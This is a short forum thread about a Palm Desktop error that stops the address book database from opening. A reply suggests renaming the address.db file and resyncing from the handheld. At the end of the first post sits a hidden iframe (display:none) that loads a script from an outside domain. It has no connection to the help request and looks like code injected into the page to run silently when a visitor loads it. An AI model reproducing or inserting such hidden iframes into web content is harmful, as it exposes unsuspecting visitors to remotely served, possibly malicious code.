When I try to open my Palm Desktop program, I get this message:
"Error: Failed to open address book database." I've been using Palm desktop version 4.0.1 with my I300 for months and have never had a problem. I tried reinstalling the program but without any luck. I have not downloaded any programs lately that could be conflicting with it. Any help would be most appreciated!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have seen this problem with the palm desktop before. It is not related to the phone. I got this solution from Palm tech support. Assuming a normal installation, the file

c:\palm\username\address\address.db

should be renamed. This will allow the palm desktop to open. Your addresses will be returned to the desktop on your next sync. For safety force the handheld to overright the desktop.
